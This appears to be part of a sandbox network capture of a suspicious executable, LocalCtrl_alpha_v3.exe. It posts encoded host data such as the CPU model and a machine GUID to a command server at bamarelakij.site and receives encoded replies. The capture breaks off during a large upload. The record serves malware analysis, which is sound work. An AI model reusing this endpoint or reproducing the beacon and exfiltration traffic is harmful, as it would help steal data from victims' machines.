Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:52 UTC	436	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 745 Host: bamarelakij.site
2025-01-09 13:42:52 UTC	745	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 8c 8e 68 35 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff a7 00 00 00 08 00 00 00 52 00 00 00 b6 ea 41 13 95 a7 40 16 d7 35 c9 59 8a 00 00 00 00 00 00 00 00 00 00 00 5b 75 a0 89 49 60 49 ca 60 01 80 d1 49 60 00 50 ca 60 80 80 d1 49 60 00 50 31 00 Data Ascii: Rh5@5YFG4I`H1FG4(((RA@5Y[uI`I`I`P`I`P1
2025-01-09 13:42:53 UTC	809	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:53 GMT Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZhmM5UD%2BZ34min6EfxMPGQE%2Bkcw609tyefY6bLLy2HdsQ1nGbmmBPihp26SvgttJTURYqhkdKKa%2BmQrJqWNdDiZswSGaYpiK9OAmpuCyO8WLuBQ8vanTZSQxZs2%2Fr%2FBG6UV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da643df16a4e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1568&rtt_var=655&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1817&delivery_rate=1590413&cwnd=212&unsent_bytes=0&cid=f85b3b89f3199e59&ts=313&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49813	172.67.174.91	443	1308	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:53 UTC	352	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 Content-Length: 147 Host: bamarelakij.site
2025-01-09 13:42:53 UTC	147	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 65 6a e4 36 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzej6$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-09 13:42:53 UTC	821	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 13:42:53 GMT Transfer-Encoding: chunked Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vA5wUFFzGAG88fNc40GtZqFUbUO9C6ct0ML17hzabXKWJcvpgcskZ0vkYVxr1%2F6AojPkp9uJq0asx2OBCusdRZ46jIvgLH3ppDdWLZssJnb1BHr5yQzNzgUr5KPbxtOsmTTp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da66fe0c80d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1705&rtt_var=657&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1135&delivery_rate=1642294&cwnd=252&unsent_bytes=0&cid=d6bde19a18937551&ts=481&x=0"
2025-01-09 13:42:53 UTC	1369	IN	Data Raw: 33 32 66 32 0d 0a f2 82 00 00 00 00 00 00 00 00 00 00 e0 c7 0b 36 0e 00 7f 0e 86 0b 13 00 ec 0e 16 11 02 ec 08 7a 59 86 0b 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 20 00 96 09 05 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 05 0f 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e ab a7 ab 1b 1a 99 19 27 b7 32 b2 2e 2b b0 36 3b b2 2e a9 3a b2 b0 b6 04 00 ac 09 ce 02 0f 00 e4 0e 16 11 02 e4 04 34 59 ce 02 bc 58 d8 c3 49 7d 17 f0 0b 00 42 01 a9 05 13 00 ec 0e 16 11 02 ec 08 34 59 a9 05 65 9b b6 a7 b7 51 c9 59 28 39 b2 33 b2 39 b2 37 b1 b2 b9 04 00 c6 03 32 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 32 0c 65 fc e2 b9 9f d9 2d 8a 04 00 24 09 7a 0d 0f 00 e4 0e 16 11 02 e4 04 76 59 7a 0d f9 87 f9 1f 08 a2 36 2c 20 00 da 0c 94 00 13 00 ec 0e 16 11 02 ec Data Ascii: 32f26zYeQY199 >YeQY#*).'2.+6;.:4YXI}B4YeQY(93972rY2e-$zvYz6,
2025-01-09 13:42:53 UTC	1369	IN	Data Raw: 76 59 d4 0e 65 9b b6 a7 b7 51 c9 59 a4 37 32 b2 3c b2 32 22 21 2e b1 34 39 b7 b6 b2 96 b2 3c 3a b2 37 b9 b4 b7 37 af b3 b7 35 34 b1 32 b3 b1 38 31 38 33 b4 b3 b1 b0 b2 35 38 33 34 33 b2 b3 b2 b5 32 b3 b4 31 36 b5 af 18 17 b4 37 32 b2 3c b2 32 32 31 17 36 b2 3b b2 36 32 31 01 00 ee 0c 76 0a 13 00 ec 0e 16 11 02 ec 08 ed 59 76 0a 65 9b b6 a7 b7 51 c9 59 05 08 00 3a 06 a4 0e 13 00 ec 0e 16 11 02 ec 08 73 59 a4 0e 65 9b b6 a7 b7 51 c9 59 b9 b2 3a 3a b4 37 b3 b9 0d 00 e8 0c c1 02 13 00 ec 0e 16 11 02 ec 08 76 59 c1 02 65 9b b6 a7 b7 51 c9 59 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 08 00 8a 03 eb 0b 13 00 ec 0e 16 11 02 ec 08 72 59 eb 0b 65 9b b6 a7 b7 51 c9 59 3a 3c 34 b4 37 3a b9 15 04 00 c7 0d 8c 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 8c 0e 9e 1e b5 b8 6b 3b 7a Data Ascii: vYeQY72<2"!.49<:7754281835834321672<2216;621vYveQY:sYeQY::7vYeQY&6:9rYeQY:<47:4Yk;z
2025-01-09 13:42:53 UTC	1369	IN	Data Raw: 08 00 b3 09 fc 04 13 00 ec 0e 16 11 02 ec 08 76 59 fc 04 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 21 00 7f 04 05 0e 13 00 ec 0e 16 11 02 ec 08 34 59 05 0e 65 9b b6 a7 b7 51 c9 59 a7 ba 3a 36 b7 b7 b5 19 18 98 1b 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a7 ba 3a 36 b7 b7 b5 08 00 dc 03 6b 04 13 00 eb 0e 16 11 02 eb 08 9a 59 6b 04 fa 7c d0 f1 1d 72 d0 75 0b e2 4f 96 21 41 96 86 04 00 93 0c f6 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 f6 0a 7b 34 35 38 8b 11 fa 0b 08 00 e1 06 36 03 13 00 eb 0e 16 11 02 eb 08 76 59 36 03 48 be bd a0 fa 4e 2a 71 b8 20 22 c7 c6 7d 6c 82 04 00 77 0e a6 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 a6 0c de 2d 81 4c 2f 08 4e 7f 19 00 c1 01 65 06 13 00 ec 0e 16 11 02 ec 08 73 59 65 06 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 Data Ascii: vYeQY8936!4YeQY:6.88":.&6.:6kYk\|ruO!ArY{4586vY6HN*q "}lwrY-L/NesYeeQY79
2025-01-09 13:42:53 UTC	1369	IN	Data Raw: b2 bc 99 17 32 31 04 00 ce 01 4c 09 0f 00 e4 0e 16 11 02 e4 04 34 59 4c 09 70 89 a2 0d 81 ac 6d 3e 09 00 cc 05 88 07 13 00 ec 0e 16 11 02 ec 08 34 59 88 07 65 9b b6 a7 b7 51 c9 59 a4 37 32 b2 3c b2 32 22 21 0a 00 37 04 08 0e 13 00 ec 0e 16 11 02 ec 08 76 59 08 0e 65 9b b6 a7 b7 51 c9 59 b6 b9 b2 32 b3 b2 17 b2 3c b2 0b 00 ef 03 72 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 72 0f 65 9b b6 a7 b7 51 c9 59 15 b9 3a b2 b0 b6 15 17 b2 3c b2 11 00 fd 0b 46 03 13 00 ec 0e 16 11 02 ec 08 9a 59 46 03 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e 2a b4 b3 b2 39 2b 27 a1 11 00 9a 05 08 07 13 00 ec 0e 16 11 02 ec 08 76 59 08 07 65 9b b6 a7 b7 51 c9 59 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 08 00 74 0f fb 05 13 00 eb 0e 16 11 02 eb 08 34 59 fb 05 00 ab 5b 92 Data Ascii: 21L4YLpm>4YeQY72<2"!7vYeQY2<r>YreQY:<FYFeQY#).9+'vYeQY49199t4Y[
2025-01-09 13:42:53 UTC	1369	IN	Data Raw: 05 00 34 04 98 04 13 00 ec 0e 16 11 02 ec 08 ed 59 98 04 65 9b b6 a7 b7 51 c9 59 15 17 39 32 38 04 00 f5 0e e9 0a 0f 00 e4 0e 16 11 02 e4 04 76 59 e9 0a 2c 36 e8 17 dc f2 d2 21 0b 00 96 04 66 0e 13 00 ec 0e 16 11 02 ec 08 ed 59 66 0e 65 9b b6 a7 b7 51 c9 59 a0 37 bc 22 b2 b9 b5 17 b2 3c b2 08 00 1b 0f 85 0c 13 00 eb 0e 16 11 02 eb 08 d8 59 85 0c 42 e9 cd 96 64 55 b8 e2 b3 77 52 f1 58 66 fe 11 06 00 23 01 93 0f 13 00 ec 0e 16 11 02 ec 08 72 59 93 0f 65 9b b6 a7 b7 51 c9 59 a0 39 b6 b7 39 bc 04 00 fa 05 f8 04 0f 00 e4 0e 16 11 02 e4 04 61 59 f8 04 84 f8 45 7e 75 dd 8a 4d 08 00 68 0c ae 06 13 00 ec 0e 16 11 02 ec 08 5b 59 ae 06 65 9b b6 a7 b7 51 c9 59 28 b0 b9 b9 bb b7 39 32 04 00 31 0c 76 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 76 0f 71 a1 31 f5 80 84 fe c6 07 Data Ascii: 4YeQY928vY,6!fYfeQY7"<YBdUwRXf#rYeQY99aYE~uMh[YeQY(921v4Yvq1
2025-01-09 13:42:53 UTC	1369	IN	Data Raw: b5 08 00 2c 01 33 0c 13 00 ec 0e 16 11 02 ec 08 34 59 33 0c 65 9b b6 a7 b7 51 c9 59 15 17 b9 b8 36 b4 3a b2 04 00 51 0a e1 09 0f 00 e4 0e 16 11 02 e4 04 73 59 e1 09 df f9 2c 2e 2f d8 e3 1d 04 00 71 0e b1 02 0f 00 e4 0e 16 11 02 e4 04 72 59 b1 02 45 2f 34 7f b7 0a fb 4c 06 00 91 0e f5 0b 13 00 ec 0e 16 11 02 ec 08 9a 59 f5 0b 65 9b b6 a7 b7 51 c9 59 2b b4 b2 bb b2 39 08 00 d8 0c 5a 0f 13 00 eb 0e 16 11 02 eb 08 9a 59 5a 0f c4 f8 d0 16 6d 6a 27 5c 35 66 4f 71 51 59 61 af 04 00 a2 0c 14 09 0f 00 e4 0e 16 11 02 e4 04 72 59 14 09 06 73 70 1d f6 b7 4a 2b 05 00 62 0f 01 01 13 00 ec 0e 16 11 02 ec 08 76 59 01 01 65 9b b6 a7 b7 51 c9 59 15 17 36 32 31 25 00 40 0e b7 04 13 00 ec 0e 16 11 02 ec 08 76 59 b7 04 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a2 Data Ascii: ,34Y3eQY6:QsY,./qrYE/4LYeQY+9ZYZmj'\5fOqQYarYspJ+bvYeQY621%@vYeQY93:.
2025-01-09 13:42:53 UTC	1369	IN	Data Raw: 07 00 e4 00 d1 05 13 00 ec 0e 16 11 02 ec 08 34 59 d1 05 65 9b b6 a7 b7 51 c9 59 24 b4 b9 3a b7 39 bc 04 00 d2 0b 8a 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 8a 0a 34 5e 90 bc c4 7b 5f 8f 08 00 a7 05 04 0f 13 00 eb 0e 16 11 02 eb 08 76 59 04 0f 95 12 0b 84 ba 02 75 3e b8 89 94 e3 86 31 33 cd 04 00 f5 03 34 05 0f 00 e4 0e 16 11 02 e4 04 72 59 34 05 69 42 1a 51 99 67 d5 62 08 00 25 07 5d 0e 13 00 eb 0e 16 11 02 eb 08 34 59 5d 0e 6a 12 61 4e 88 ae 7f b6 9b 8c fe 29 b4 9d 39 45 08 00 1e 03 e9 09 13 00 eb 0e 16 11 02 eb 08 9a 59 e9 09 dd d5 39 9b bd 27 28 fd 2c 4b a6 fc 81 14 6e 0e 04 00 10 07 74 0b 0f 00 e4 0e 16 11 02 e4 04 72 59 74 0b e6 76 8b fb 16 53 44 c8 04 00 c8 01 9f 01 0f 00 e4 0e 16 11 02 e4 04 72 59 9f 01 c7 17 73 5c 36 32 bc 6f 08 00 11 04 ce 00 13 00 Data Ascii: 4YeQY$:9rY4^{_vYu>134rY4iBQgb%]4Y]jaN)9EY9'(,KntrYtvSDrYs\62o
2025-01-09 13:42:53 UTC	1369	IN	Data Raw: b5 bd 42 09 38 11 00 51 0f 04 03 13 00 ec 0e 16 11 02 ec 08 34 59 04 03 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a7 ba 3a 36 b7 b7 b5 04 00 be 0b e8 09 0f 00 e4 0e 16 11 02 e4 04 76 59 e8 09 f8 a5 d3 7c 08 61 e9 4a 1d 00 66 09 02 08 13 00 ec 0e 16 11 02 ec 08 73 59 02 08 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a9 3a b0 31 36 b2 2e b5 b2 bc 04 00 47 06 a0 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 a0 0f a5 f3 2d 12 54 d6 e2 21 04 00 ed 03 21 0f 0f 00 e4 0e 16 11 02 e4 04 72 59 21 0f f2 f7 51 80 02 d6 9e b3 24 00 51 0b 4f 0a 13 00 ec 0e 16 11 02 ec 08 76 59 4f 0a 65 9b b6 a7 b7 51 c9 59 a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b1 34 39 b7 b6 b2 17 b2 3c b2 05 00 dd 0a f6 07 Data Ascii: B8Q4YeQY93:.:6vY\|aJfsYeQY79."92.:16.G4Y-T!!rY!Q$QOvYOeQY6.49.886:7.49<
2025-01-09 13:42:53 UTC	1369	IN	Data Raw: 00 b0 04 ca 0b 13 00 eb 0e 16 11 02 eb 08 76 59 ca 0b 6e 57 fe 37 e7 49 29 9d 95 c9 61 50 db 7a 6f 6e 01 00 75 0d 9c 08 13 00 ec 0e 16 11 02 ec 08 72 59 9c 08 65 9b b6 a7 b7 51 c9 59 15 06 00 d3 01 a9 0d 13 00 ec 0e 16 11 02 ec 08 76 59 a9 0d 65 9b b6 a7 b7 51 c9 59 a1 34 39 b7 b6 b2 04 00 7a 01 db 05 0f 00 e4 0e 16 11 02 e4 04 76 59 db 05 c6 c7 a7 11 36 03 9d 27 04 00 70 0a c3 07 0f 00 e4 0e 16 11 02 e4 04 d8 59 c3 07 32 9f 88 20 f8 51 2f 25 58 00 54 07 da 01 13 00 ec 0e 16 11 02 ec 08 34 59 da 01 65 9b b6 a7 b7 51 c9 59 a9 b7 33 3a bb b0 39 b2 2e a6 b4 b1 39 b7 b9 b7 33 3a 2e a7 33 33 b4 b1 b2 2e 98 1b 17 18 2e a7 ba 3a 36 b7 b7 b5 2e 28 39 b7 33 b4 36 b2 b9 2e a7 ba 3a 36 b7 b7 b5 2e 9c 99 9b 9a a1 23 23 18 1a 98 99 98 98 98 32 99 21 1c 1c a0 18 18 98 Data Ascii: vYnW7I)aPzonurYeQYvYeQY49zvY6'pY2 Q/%XT4YeQY3:9.93:.33..:6.(936.:6.##2!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49814	172.67.174.91	443	1280	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:53 UTC	436	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 212 Host: bamarelakij.site
2025-01-09 13:42:53 UTC	212	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 99 00 00 00 08 00 00 00 52 00 00 00 6f d2 a9 18 95 a7 40 16 d7 35 c9 59 83 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c c9 60 60 49 60 c8 00 31 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: Ro@5Yi``I`1i(((
2025-01-09 13:42:54 UTC	809	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:53 GMT Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hVCPk0XM5pwc%2FqBIBspsYCIElkCNjxcUmvYS615y6Hgw%2FfimQ%2BmeOAhDgGlWV84QWYjlVfahluH%2Bq6AeHz7Ukg0rosAu2WwMkg5t4kBMOFru5UGZIZATJdFtWjyBcbKfPu5%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da6a1833f78d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1633&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1284&delivery_rate=1754807&cwnd=125&unsent_bytes=0&cid=729f18ce23b23d92&ts=325&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49815	172.67.174.91	443	1308	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:54 UTC	435	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 53 Host: bamarelakij.site
2025-01-09 13:42:54 UTC	53	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2025-01-09 13:42:54 UTC	746	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 13:42:54 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Siqa7xkJQDqqYSTlMIkOv60mstn50llMXQjDbk2hPCefB82gP5bfoGUctM49JJjn6x%2FGxX2svQNsc5js86OkIeEcNAMQJI9F7%2BWiN5gmJEkXQ6MmlR7Q%2FOKwQrBVA1FsxSfV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da6f0dd80cc0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1686&rtt_var=640&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1124&delivery_rate=1700640&cwnd=218&unsent_bytes=0&cid=d5ea9cacca33c553&ts=349&x=0"
2025-01-09 13:42:54 UTC	74	IN	Data Raw: 34 34 0d 0a 34 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 9a ce 09 e9 04 fd ce 22 14 11 c3 ce 35 68 8e 8c ce 13 03 02 51 ce 18 a9 d2 6f ce 13 41 ea b6 ce 2c 3d 05 b5 ce 17 d8 a7 80 ce 30 4e 31 f5 ce 13 1e 36 8e 0d 0a Data Ascii: 444"5hQoA,=0N16
2025-01-09 13:42:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49816	172.67.174.91	443	1280	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:54 UTC	436	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 380 Host: bamarelakij.site
2025-01-09 13:42:54 UTC	380	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 f5 31 4e 30 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 94 00 00 00 08 00 00 00 52 00 00 00 8e 36 1e 13 95 a7 40 16 d7 35 c9 59 01 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 c8 48 31 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 28 a5 03 03 16 Data Ascii: R1N0@5Y'I`H1'(((R6@5YGH1G(
2025-01-09 13:42:54 UTC	815	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:54 GMT Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SF3tR2R1S%2F4SBSl%2B%2BZwLsFIF1Y%2FvQn%2BBt08uSYIFGTraueBPAMtxzwWdWiHCavjN99m89xvaTfDewg%2BXVOKi9nj1%2BM8XesPtJF4pn2cI4TEouvCYRBqSK%2FmHzUJYGq6itNoi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da6f1fa718c8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1659&rtt_var=630&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1452&delivery_rate=1727810&cwnd=148&unsent_bytes=0&cid=8040dec7ebf27f87&ts=238&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49817	172.67.174.91	443	1308	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:56 UTC	438	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 58769 Host: bamarelakij.site
2025-01-09 13:42:56 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 56 e5 00 00 08 00 00 00 52 00 00 00 3a eb 68 36 95 a7 40 16 d7 35 c9 59 02 00 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b c9 60 00 48 11 f2 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b 28 a5 81 02 96 00 00 04 04 00 ec 0a 1c ab 54 4c 32 94 ff ff ff ff ff ff ff ff 0d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e a3 a0 a7 21 a1 2b a4 a8 a4 25 17 38 32 33 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd a3 a0 a7 21 a1 2b a4 a8 a4 25 a2 a0 aa 28 ab 22 28 29 2d a1 a1 21 27 a7 26 a4 21 2b 29 28 28 26 2d 28 27 22 2c a6 2c ab a0 24 2a 2b 2b aa 25 25 29 aa a9 23 a4 ab 29 a6 a6 a9 29 a5 a7 a8 24 a1 ac a9 ac aa 21 a6 a9 2c 2d 26 aa 22 2c 28 27 a5 a4 28 25 24 27 26 a4 a5 